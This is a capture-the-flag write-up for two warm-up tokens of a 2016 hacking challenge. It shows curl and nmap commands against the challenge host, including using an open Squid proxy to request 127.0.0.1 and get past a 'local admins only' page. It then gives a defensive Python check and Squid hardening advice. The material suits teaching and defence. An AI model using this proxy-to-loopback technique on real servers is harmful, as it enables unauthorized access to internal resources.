usd hacking challenge 2016 writeup: tokens 1 and 2
I found the gradual increase in difficulty quite nice in this challenge. The first two tokens were for warm-up.
Token 1 - gotta get our heads just right
Within the first few seconds of this engagement, I had already looked at the HTTP response headers of the site. So there it was, the first token in plain sight:
    js@eris:~/usdhc$ curl -I http://188.8.131.52/index.php
    HTTP/1.1 200 OK
    Date: Sat, 19 Mar 2016 21:55:22 GMT
    Server: Apache
    Token: 583397
    Content-Type: text/html; charset=UTF-8
Token 2 - no place like 127.0.0.1
    js@eris:~/usdhc$ curl http://184.108.40.206/restricted/
    <!DOCTYPE html>
    <html>
    <head>
    <title>usd Hackertag Challenge Webseite</title>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" >
    [..]
    <div id="contentliquid"><div id="content">Token value can only be viewed by local admins.</div></div>
    [..]
Only local admins? I did think of what turned out to be the solution right when I read this, but started to poke around aimlessly with cookies, parameters, hidden files etc. first. I even did a fruitless nikto scan. The next morning it occurred to me I had not even done a basic port scan of the challenge site, so without expecting too much I fired up nmap:
    js@eris:~/usdhc$ nmap -A 220.127.116.11

    Starting Nmap 6.40 ( http://nmap.org ) at 2016-03-19 22:01 CET
    Nmap scan report for 18.104.22.168
    Host is up (0.022s latency).
    Not shown: 998 closed ports
    PORT     STATE SERVICE    VERSION
    80/tcp   open  http       Apache httpd
    |_http-methods: No Allow or Public header in OPTIONS response (status code 200)
    |_http-title: usd Hackertag Challenge Webseite
    3128/tcp open  http-proxy Squid http proxy 3.4.8
    |_http-methods: No Allow or Public header in OPTIONS response (status code 400)
    |_http-title: ERROR: The requested URL could not be retrieved
    Aggressive OS guesses: Netgear DG834G WAP or Western Digital WD TV media player (92%), Linux 2.6.32 - 2.6.36 (90%), Linux 3.1 (89%), Linux 3.2 (89%), AXIS 210A or 211 Network Camera (Linux 2.6) (88%), OpenWrt 12.09-rc1 Attitude Adjustment (Linux 3.3 - 3.7) (88%), Linux 3.7 - 3.9 (88%), ODROID-U2 Android development board (Linux 3.0) (88%), Linux 2.6.32 (88%), Linux 3.6.10 (88%)
    No exact OS matches for host (test conditions non-ideal).
    Network Distance: 8 hops
Oh, Squid! Let's see:
    js@eris:~/usdhc$ curl -sx http://22.214.171.124:3128 http://localhost/restricted/ | grep -i token
    <div id="contentliquid"><div id="content">Token value can only be viewed by local admins.</div></div>
Hmm. Seemed I could connect through the proxy, but still no token. How about this:
    js@eris:~/usdhc$ curl -sx http://126.96.36.199:3128 http://127.0.0.1/restricted/ | grep -i token
    <div id="contentliquid"><div id="content">Token: 134923</div></div>
Home, sweet home.
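The root cause behind token 2 is a "local admins only" decision that trusts the address a connection arrives from, while a forwarding proxy on the same box turns any internet client into a loopback peer. The challenge page does not show the server-side check, so the following is an added, self-contained Python illustration (not the challenge's code) of the weak check next to a hardened variant. It assumes the proxy behaves like a default-configured Squid, which (with `via on` and `forwarded_for on`) stamps relayed requests with `Via` and `X-Forwarded-For`; the sample requests are constructed, and the addresses in them are documentation ranges, not the challenge host.

```python
import ipaddress

# Constructed sample requests (not from the challenge) as the backend would see them:
# (description, peer address of the TCP connection, request headers).
SAMPLE_REQUESTS = [
    ("direct from the box itself", "127.0.0.1", {"Host": "127.0.0.1"}),
    ("remote client, no proxy", "203.0.113.5", {"Host": "198.51.100.10"}),
    # A Squid on the same host relayed this one: the TCP peer is loopback, but
    # Squid's defaults tag the request with Via and X-Forwarded-For naming the
    # real client. (Assumed default Squid behaviour; the page does not show it.)
    ("remote client via local Squid", "127.0.0.1",
     {"Host": "127.0.0.1",
      "Via": "1.1 proxyhost (squid/3.4.8)",
      "X-Forwarded-For": "203.0.113.5"}),
]

# Headers that only appear when some intermediary handled the request.
PROXY_HEADERS = ("via", "x-forwarded-for", "forwarded")


def peer_is_loopback(remote_addr: str) -> bool:
    """True for 127.0.0.0/8 and ::1; malformed input is treated as not local."""
    try:
        return ipaddress.ip_address(remote_addr).is_loopback
    except ValueError:
        return False


def weak_is_local_admin(remote_addr: str, headers: dict) -> bool:
    """The kind of check a same-host proxy walks straight through: it trusts
    the peer address alone and ignores how the request got there."""
    return peer_is_loopback(remote_addr)


def hardened_is_local_admin(remote_addr: str, headers: dict) -> bool:
    """Accept only a loopback peer that shows no sign of having been relayed.
    A proxy header on a loopback connection means a process on this box
    forwarded somebody else's request, so the source address proves nothing."""
    if not peer_is_loopback(remote_addr):
        return False
    present = {name.lower() for name in headers}
    return not any(h in present for h in PROXY_HEADERS)


def evaluate(requests=SAMPLE_REQUESTS):
    """Run both checks over the sample requests; returns (desc, weak, hardened)."""
    return [(desc, weak_is_local_admin(addr, hdrs), hardened_is_local_admin(addr, hdrs))
            for desc, addr, hdrs in requests]


if __name__ == "__main__":
    for desc, weak, hardened in evaluate():
        print(f"{desc:32s} weak={weak!s:5s} hardened={hardened}")
```

The header check is defence in depth only: a proxy configured with `via off` and `forwarded_for delete` leaves no trace, so the decisive fixes sit at the proxy and the architecture. Squid's stock configuration already ships `acl to_localhost dst 127.0.0.0/8 0.0.0.0/32 ::1` together with `http_access deny to_localhost`, and restricts clients with `http_access allow localnet` followed by `http_access deny all`; a proxy reachable from the internet and allowed to reach loopback, as in the scan above, has had both of those relaxed. Beyond that, an admin-only page should be gated by authentication rather than by source address, and a service that truly is local-only should bind to 127.0.0.1 on its own listener rather than sharing the public vhost.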